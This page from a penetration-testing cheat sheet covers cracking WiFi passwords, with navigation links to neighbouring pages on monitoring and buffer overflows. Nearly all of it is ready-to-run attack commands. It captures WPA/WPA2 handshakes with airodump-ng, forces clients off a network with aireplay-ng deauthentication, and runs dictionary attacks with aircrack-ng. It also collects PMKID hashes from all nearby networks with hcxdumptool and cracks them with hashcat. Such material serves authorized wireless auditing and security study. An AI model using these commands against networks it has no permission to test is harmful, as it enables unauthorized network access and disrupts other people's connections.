Cracking

Check if the interface supports packet injection

aireplay-ng --test wlan1 -e essid -a FF:FF:FF:FF:FF:FF

WPA/WPA2 Handshake

Monitor a WiFi network to capture WPA/WPA2 4-way handshake

airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid essid --bssid FF:FF:FF:FF:FF:FF

[Optional] Deauthenticate clients from a WiFi network

aireplay-ng --deauth 10 wlan1 -e essid -a FF:FF:FF:FF:FF:FF

Start the dictionary attack against a WPA/WPA2 Handshake

aircrack-ng -e essid -b FF:FF:FF:FF:FF:FF -w rockyou.txt airodump_essid_results*.cap

PMKID Attack

Crack the WPA/WPA2 authentication without deauthenticating clients

Install the required tools:

apt-get update && apt-get -y install hcxtools

Start capturing PMKID Hashes for all nearby networks

hcxdumptool --enable_status=1 -o hcxdumptool_results.cap -i wlan0mon

Start capturing PMKID Hashes for a specific network

echo HH:HH:HH:HH:HH:HH | sed 's/\://g' >> filter.txt

hcxdumptool --enable_status=1 -o hcxdumptool_results.cap -i wlan0mon --filterlist_ap=filter.txt --filtermode=2

Extract PMKID hashes from a PCAP file:

hcxpcaptool hcxdumptool_results.cap -k hashes.txt

Start the dictionary attack against PMKID hashes

hashcat -m 16800 -a 0 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt rockyou.txt

PreviousMonitoring NextBuffer Overflows

Last updated 1 year ago

hashtagWPA/WPA2 Handshake

hashtagPMKID Attack

WPA/WPA2 Handshake

PMKID Attack